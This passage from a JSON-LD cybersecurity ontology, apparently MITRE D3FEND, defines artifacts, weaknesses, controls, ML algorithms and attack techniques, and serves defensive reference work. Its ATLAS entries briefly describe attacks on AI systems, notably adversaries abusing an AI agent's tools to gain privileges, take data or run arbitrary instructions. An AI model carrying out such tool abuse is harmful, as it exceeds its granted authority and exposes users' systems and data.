      "@id": "d3f:may-interpret",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-interpret y: The entity x may interpret the thing y; that is, 'x interprets y' may be true.",
      "rdfs:label": "may-interpret",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:InitScript",
      "@type": "owl:Class",
      "d3f:definition": "An init script (or initialization script) is an executable script that initializes an application, a process, or a service's state. Examples include scripts run at boot by Unix or Windows, or those run to initialize a shell.",
      "rdfs:label": "Init Script",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Init"
        },
        {
          "@id": "https://blog.opstree.com/2020/02/11/shell-initialization-files/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      },
      "skos:altLabel": "Initialization Script"
    },
    {
      "@id": "d3f:Cloud-basedDatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database application where the underlying infrastructure is managed by a third-party cloud provider. Examples include DynamoDB, Firestore, and CosmosDB.",
      "d3f:provider": {
        "@id": "d3f:CloudServiceProvider"
      },
      "d3f:synonym": "Serverless Database Application",
      "rdfs:label": "Cloud-based Database Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseServiceApplication"
        },
        {
          "@id": "_:N2f58a002547248beb29a3685ec6170d9"
        }
      ]
    },
    {
      "@id": "_:N2f58a002547248beb29a3685ec6170d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:provider"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceProvider"
      }
    },
    {
      "@id": "d3f:AuthorizationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event reflecting the decision-making process and actions concerning access control, recording whether agents are permitted or denied access to resources based on pre-defined access control policies.",
      "rdfs:label": "Authorization Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/authorize_session"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N25fd8775748d412aa7c990f0937be8f9"
        },
        {
          "@id": "_:Nf7fb115f9a0049a28996bf8eeef23b5d"
        }
      ]
    },
    {
      "@id": "_:N25fd8775748d412aa7c990f0937be8f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:Nf7fb115f9a0049a28996bf8eeef23b5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:CWE-602",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-602",
      "d3f:definition": "The product is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.",
      "rdfs:label": "Client-Side Enforcement of Server-Side Security",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:T1664",
      "@type": "owl:Class",
      "d3f:attack-id": "T1664",
      "d3f:definition": "Adversaries may exploit software vulnerabilities to gain initial access to a mobile device.",
      "rdfs:label": "Exploitation for Initial Access - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploitation for Initial Access"
    },
    {
      "@id": "d3f:StorageSnapshot",
      "@type": "owl:Class",
      "d3f:definition": "A storage snapshot is a copy of a storage medium or system environment at a point in time.",
      "rdfs:label": "Storage Snapshot",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputingSnapshot"
      }
    },
    {
      "@id": "d3f:CART",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-CAR",
      "d3f:definition": "The CART algorithm is a type of classification algorithm that is required to build a decision tree on the basis of Gini’s impurity index.",
      "d3f:kb-article": "## References\nClassification and Regression Tree (CART) Algorithm. Analytics Steps. [Link](https://www.analyticssteps.com/blogs/classification-and-regression-tree-cart-algorithm).",
      "rdfs:label": "CART",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:T1027.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.014",
      "d3f:definition": "Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone)",
      "rdfs:label": "Polymorphic Code",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:WebFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addressed-by": {
        "@id": "d3f:URL"
      },
      "d3f:definition": "A web file resource is a file resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileResource"
        },
        {
          "@id": "d3f:WebResource"
        },
        {
          "@id": "_:N079c4c98fee34974ab653adaa760c3b2"
        }
      ]
    },
    {
      "@id": "_:N079c4c98fee34974ab653adaa760c3b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addressed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:AML.T0014",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0014",
      "d3f:definition": "Adversaries may discover the general family of model.\nGeneral information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model's responses to categorize it.\n\nKnowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.",
      "rdfs:label": "Discover AI Model Family - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0014"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Family"
    },
    {
      "@id": "d3f:EnsembleLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EL",
      "d3f:definition": "In statistics and machine learning, ensemble methods use multiple learning algorithms to obtain better predictive performance than could be obtained from any of the constituent learning algorithms alone",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Ensemble Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:RegSetValueW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueW"
    },
    {
      "@id": "d3f:PhysicalAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalAccessMediation"
      ],
      "d3f:d3fend-id": "D3-PAM",
      "d3f:definition": "Physical access mediation is the process of granting or denying specific requests to enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances.)",
      "d3f:isolates": {
        "@id": "d3f:PhysicalArtifact"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CNNSI-4009"
      },
      "d3f:mediates-access-to": {
        "@id": "d3f:PhysicalArtifact"
      },
      "d3f:synonym": "Physical Access Control",
      "rdfs:label": "Physical Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Na92c6dcee0434c2b8b3b433470a61a60"
        },
        {
          "@id": "_:N8c53977e131c4b60ae9fd1831182c142"
        }
      ]
    },
    {
      "@id": "_:Na92c6dcee0434c2b8b3b433470a61a60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "_:N8c53977e131c4b60ae9fd1831182c142",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:MemoryMapEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the mapping of memory regions into a process's virtual address space, enabling efficient access to shared or reserved memory.",
      "rdfs:label": "Memory Map Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:Nb5684201603e45ed98d16e6ccd4c5a53"
        },
        {
          "@id": "_:N462d8c611c4e4894ac911b2c9c906a8d"
        }
      ]
    },
    {
      "@id": "_:Nb5684201603e45ed98d16e6ccd4c5a53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualMemorySpace"
      }
    },
    {
      "@id": "_:N462d8c611c4e4894ac911b2c9c906a8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1093",
      "@type": "owl:Class",
      "d3f:attack-id": "T1093",
      "d3f:definition": "Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1055.012",
      "rdfs:label": "Process Hollowing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1055.012"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1400",
      "@type": "owl:Class",
      "d3f:attack-id": "T1400",
      "d3f:definition": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1625.001",
      "rdfs:label": "Modify System Partition - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1625.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Modify System Partition"
    },
    {
      "@id": "d3f:ShimDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application configuration database that contains or points to software shims (e.g., for backward compatibility, patches, etc.)",
      "d3f:synonym": "Microsoft Shim Database File",
      "rdfs:label": "Shim Database",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:AML.TA0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0008",
      "d3f:definition": "The adversary is trying to figure out your AI environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network.\nThese techniques help adversaries observe the environment and orient themselves before deciding how to act.\nThey also allow adversaries to explore what they can control and what's around their entry point in order to discover how it could benefit their current objective.\nNative operating system tools are often used toward this post-compromise information-gathering objective.",
      "rdfs:label": "Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:T0843",
      "@type": "owl:Class",
      "d3f:attack-id": "T0843",
      "d3f:definition": "Adversaries may perform a program download to transfer a user program to a controller.",
      "rdfs:label": "Program Download - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Program Download"
    },
    {
      "@id": "d3f:T1675",
      "@type": "owl:Class",
      "d3f:attack-id": "T1675",
      "d3f:definition": "Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd` on Linux.(Citation: Broadcom VMware Tools Services)",
      "rdfs:label": "ESXi Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Unsuccessful Logon Attempts",
      "d3f:exactly": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-7"
    },
    {
      "@id": "d3f:ContainerBuildTool",
      "@type": "owl:Class",
      "d3f:definition": "A software build tool that creates a container (e.g., Docker container) for deployment.",
      "rdfs:label": "Container Build Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackagingTool"
      }
    },
    {
      "@id": "d3f:T1564.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.005",
      "d3f:definition": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)",
      "d3f:may-modify": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "d3f:modifies": {
        "@id": "d3f:Storage"
      },
      "rdfs:label": "Hidden File System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N78f885ee5d20493ab4bacda6129add68"
        },
        {
          "@id": "_:N1370042fed564fba9145d79bb3d2aa7c"
        }
      ]
    },
    {
      "@id": "_:N78f885ee5d20493ab4bacda6129add68",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N1370042fed564fba9145d79bb3d2aa7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:may-be-weakness-of",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-have-weakness"
      },
      "rdfs:domain": {
        "@id": "d3f:Weakness"
      },
      "rdfs:label": "may-be-weakness-of",
      "rdfs:range": {
        "@id": "d3f:Artifact"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Reference-FWTK-FirewallToolkit_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://blogs.gartner.com/john_pescatore/2008/10/02/this-week-in-network-security-history-the-firewall-toolkit/"
      },
      "d3f:kb-abstract": "delivered to DARPA in ~1993",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-title": "FWTK - Firewall Toolkit",
      "rdfs:label": "Reference - FWTK - Firewall Toolkit"
    },
    {
      "@id": "d3f:EX-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0001",
      "d3f:definition": "Replay is the re-transmission of previously captured traffic, over RF links, crosslinks, or internal buses, to elicit the same processing and effects a second time. Adversaries first observe and record authentic exchanges (telecommands, ranging/acquisition frames, housekeeping telemetry acknowledgments, bus messages), then resend them within acceptance conditions that the system recognizes, matching link geometry, timetags, counters, or mode states. The aim can be functional (re-triggering an action such as a mode change), observational (fingerprinting how the vehicle reacts at different states), or disruptive (saturating queues and bandwidth to crowd out legitimate traffic). Because replays preserve valid syntax and often valid context, they can blend with normal operations, especially during periods with reduced monitoring or when counters and windows reset (e.g., handovers, safing entries). On encrypted links, metadata replays (acquisition beacons, schedule requests) may still yield informative responses.",
      "rdfs:label": "Replay - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Replay"
    },
    {
      "@id": "d3f:CWE-1100",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1100",
      "d3f:definition": "The product or code does not isolate system-dependent functionality into separate standalone modules.",
      "rdfs:label": "Insufficient Isolation of System-Dependent Functions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:d3fend-kb-object-property",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x d3fend-kb-object-property y: The object y is a d3fend knowledge base object property. These properties allow the linkage of knowledge and information supporting and illustrating the d3fend model.",
      "rdfs:label": "d3fend-kb-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:WindowsWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to the specified file or input/output (I/O) device.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtWriteFile"
        },
        {
          "@id": "d3f:WindowsNtWriteFileGather"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile"
      },
      "rdfs:label": "Windows WriteFile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIWriteFile"
        },
        {
          "@id": "_:Nae8a672ed1924f1aab0b681b8889fd46"
        },
        {
          "@id": "_:N3e31326d12ab4f41bc16492a2fd92691"
        }
      ]
    },
    {
      "@id": "_:Nae8a672ed1924f1aab0b681b8889fd46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteFile"
      }
    },
    {
      "@id": "_:N3e31326d12ab4f41bc16492a2fd92691",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtWriteFileGather"
      }
    },
    {
      "@id": "d3f:AML.T0053",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0053",
      "d3f:definition": "Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.\n\nThis may allow adversaries to execute API calls to integrated applications or services, providing the adversary with increased privileges on the system. Adversaries may take advantage of connected data sources to retrieve sensitive information. They may also use an LLM integrated with a command or script interpreter to execute arbitrary instructions.\n\nAI agents may be configured to have access to tools that are not directly accessible by users. Adversaries may abuse this to gain access to tools they otherwise wouldn't be able to use.",
      "rdfs:label": "AI Agent Tool Invocation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0053"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASExecutionTechnique"
        },
        {
          "@id": "d3f:ATLASPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "AI Agent Tool Invocation"
    },
    {
      "@id": "d3f:MultimediaDocumentFile",
      "@type": "owl:Class",
      "d3f:definition": "Digital video files which often contain audio.",
      "rdfs:label": "Multimedia Document File",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Multimedia"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "d3f:CWE-703",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-703",
      "d3f:definition": "The product does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the product.",
      "rdfs:label": "Improper Check or Handling of Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:T1649",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:attack-id": "T1649",
      "d3f:definition": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)",
      "d3f:forges": {
        "@id": "d3f:Certificate"
      },
      "d3f:may-access": [
        {
          "@id": "d3f:CertificateTrustStore"
        },
        {
          "@id": "d3f:CredentialManagementSystem"
        }
      ],
      "rdfs:label": "Steal or Forge Authentication Certificates",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nb48dd02097fb47aeba5e8731f418056d"
        },
        {
          "@id": "_:N984b7df625b44d788d3e241c2a81b5f3"
        },
        {
          "@id": "_:N4617534be89a4ae4b75f195902e0e780"
        },
        {
          "@id": "_:N7bd1a853caa64f69806ee7cb435b854f"
        }
      ]
    },
    {
      "@id": "_:Nb48dd02097fb47aeba5e8731f418056d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:N984b7df625b44d788d3e241c2a81b5f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "_:N4617534be89a4ae4b75f195902e0e780",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateTrustStore"
      }
    },
    {
      "@id": "_:N7bd1a853caa64f69806ee7cb435b854f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CredentialManagementSystem"
      }
    },
    {
      "@id": "d3f:T1026",
      "@type": "owl:Class",
      "d3f:attack-id": "T1026",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Multiband Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:IA-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001",
      "d3f:definition": "Adversaries achieve first execution before the spacecraft ever flies by inserting malicious code, data, or configuration during manufacturing, integration, or delivery. Targets include software sources and dependencies, build systems and compilers, firmware/bitstreams for MCUs and FPGAs, configuration tables, test vectors, and off-the-shelf avionics. Inserted artifacts are designed to appear legitimate, propagate through normal processes, and activate under routine procedures or specific modes (e.g., safing, maintenance). Common insertion points align with where trust is assumed, vendor updates, mirrors and registries, CI/CD runners, programming stations, and “golden image” repositories. The result is pre-positioned access that blends with baseline behavior, often with delayed or conditional triggers and strong deniability.",
      "rdfs:label": "Compromise Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Supply Chain"
    },
    {
      "@id": "d3f:Reference-DecoyPersonasForSafeguardingOnlineIdentityUsingDeception_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.archive.org/web/20180407204216/https://isc.sans.edu/diary/Decoy+Personas+for+Safeguarding+Online+Identity+Using+Deception/16159"
      },
      "d3f:kb-abstract": "What if online scammers weren't sure whether the user account they are targeting is really yours, or whether the information they compiled about you is real? It's worth considering whether decoy online personas might help in the quest to safeguard our digital identities and data.\n\nI believe deception tactics, such as selective and careful use of honeypots, holds promise for defending enterprise IT resources. Some forms of deception could also protect individuals against online scammers and other attackers. This approach might not be quite practical today for most people, but in the future we might find it both necessary and achievable.\n\nHuman attackers and malicious software pursue user accounts and data on-line through harvesting, phishing, password-guessing, software vulnerabilities, and various other means. How might we use decoys to confuse, misdirect, slow down and detect adversaries engaged in such activities?\n\n...\n\nThe wealth of personal details available on social networking sites allows attackers to target individuals using social engineering, secret question-guessing and other techniques. For some examples of such approaches, see The Use of Fake or Fraudulent LinkedIn Profiles and Data Mining Resumes for Computer Attack Reconnaissance.\n\nSetting up one or more fake social network profiles (e.g., on Facebook) that use the person's real name can help the individual deflect the attack or can act as an early warning of an impending attack. A decoy profile could purposefully expose some inaccurate information, while the person's real profile would be more carefully concealed using the site's privacy settings. 
Decoy profiles would be associated with spamtrap email addresses.\n\nSimilarly, the person could expose decoy profiles on other sites, for instance those reveal shopping habits (e.g., Amazon), musings (e.g., Twitter), skills (e.g., GitHub), travel (e.g., TripIt), affections (e.g., Pinterest), music taste (e.g., Pandora) and so on. The person's decoy identities could also have fake resumes available on sites such as Indeed and Monster.com.",
      "d3f:kb-author": "Lenny Zeltser",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "SANS",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPersona"
      },
      "d3f:kb-reference-title": "Decoy Personas for Safeguarding Online Identity Using Deception",
      "rdfs:label": "Reference - Decoy Personas for Safeguarding Online Identity Using Deception - MITRE"
    },
    {
      "@id": "d3f:K-NearestNeighbors",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KNN",
      "d3f:definition": "The k-nearest neighbors algorithm, also known as KNN or k-NN, is a non-parametric, supervised learning classifier, which uses proximity to make classifications or predictions about the grouping of an individual data point.",
      "d3f:kb-article": "## **How it works**\nThe goal of the k-nearest neighbor algorithm is to identify the nearest neighbors of a given query point, so that we can assign a class label to that point. To determine which data points are closest to a given query point, the distance between the query point and the other data points will need to be calculated. The distance measures used can vary depending on the data set or implementation and help inform decision boundaries, which query points into different regions. Then, by defining the k-value (the number of neighbors to be checked to determine the classification of a specific query point), the data can be assigned its class label.\n\nFor classification problems, a class label is assigned on the basis of a majority vote—i.e. the label that is most frequently represented around a given data point is used (the term “majority vote” is commonly used in literature, however, the technique is more technically considered “plurality voting”).  Regression problems use a similar concept as classification problem, but in this case, the average the k nearest neighbors is taken to make a prediction about a classification. The main distinction here is that classification is used for discrete values, whereas regression is used with continuous ones.\n\nUnlike other algorithms that explicitly model the problem, such as linear regression, KNN is instance-based. It means that the algorithm doesn't explicitly learn a model. Instead, it memorizes the training instances and uses them as \"knowledge\" for the prediction phase. 
It's also worth noting that the KNN algorithm is also part of a family of “lazy learning” models, meaning that it only stores a training dataset versus undergoing a training stage.\n\n## **Considerations**\n\n* **Scaling:** Scaling is a problem as KNN is a lazy algorithm and takes up more memory and storage compared to other classification methods.\n\n* **Implementation and Hyperparameters:** As KNN only requires a k-value and a distance metric, it is often an easy implementation and can adjust will to new training data.\n\n## Key Test Considerations\n\n- **Supervised Learning:**\n\n  - **Cross Validation:** As cross validation methods like k-fold, leave-one-out, and stratified cross validation can help validate model performance. However, nuances like pessimism bias in k-fold cross validation or high variability in leave-one-out cross validation may need consideration.\n\n- **Classification:**\n\n  - **ROC Curve:**  A standard technique used to summarize classifier performance over a range of tradeoffs between true and false positives is the Receiver Operating Characteristic (ROC) curve.\n\n  - **Data Imbalance:** Imbalanced data sets where one class significantly outnumbers others, under sampling techniques like SMOTE may be beneficial in sampling minority classes.\n\n- **K-Nearest Neighbor**\n\n  - **Choice of K:** The number of neighbors, K, affects the decision boundary. A smaller K can lead to a noisy decision boundary, while a large K can smooth it out, but may also blur class distinctions.\n\n  - **K-d Tree:** Exact searching on large datasets can be computationally costly and inefficient. Implementing approximate nearest neighbor algorithms like the K-d tree algorithm.\n\n  - **Dimensionality:** KNN does not perform well while using high-dimensional data and can be sensitive to irrelevant features which can lead to overfitting.\n\n  - **Distance Metric:** Choosing the appropriate distance metric (Euclidean, Manhattan, MinKowski, Hamming etc.) 
is essential, based on the nature of the data.\n\n## **References**\n1. IBM. K-Nearest Neighbors Algorithm.  [Link](https://www.ibm.com/topics/knn?mhsrc=ibmsearch_a&mhq=k-nearest%20neighbors%20).\n2. Muja, M., & Lowe, D. G. (2014). Scalable nearest neighbor algorithms for high dimensional data. IEEE Transactions on Pattern Analysis and Machine Intelligence. [Link]( https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=6809191).\n3. Chawla, N. V., Bowyer, K. W., Hall, L. O., & Kegelmeyer, W. P. (2002). SMOTE: synthetic minority over-sampling technique. Journal of artificial intelligence research, 16, 321-357. [Link]( https://www.jair.org/index.php/jair/article/view/10302/24590).\n4. Kohavi, R. (1995). A study of cross-validation and bootstrap for accuracy estimation and model selection. Proceedings of the 14th international joint conference on Artificial intelligence . [Link]( https://www.ijcai.org/Proceedings/95-2/Papers/016.pdf).",
      "rdfs:label": "K-Nearest Neighbors",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:CWE-379",
      "@type": "owl:Class",
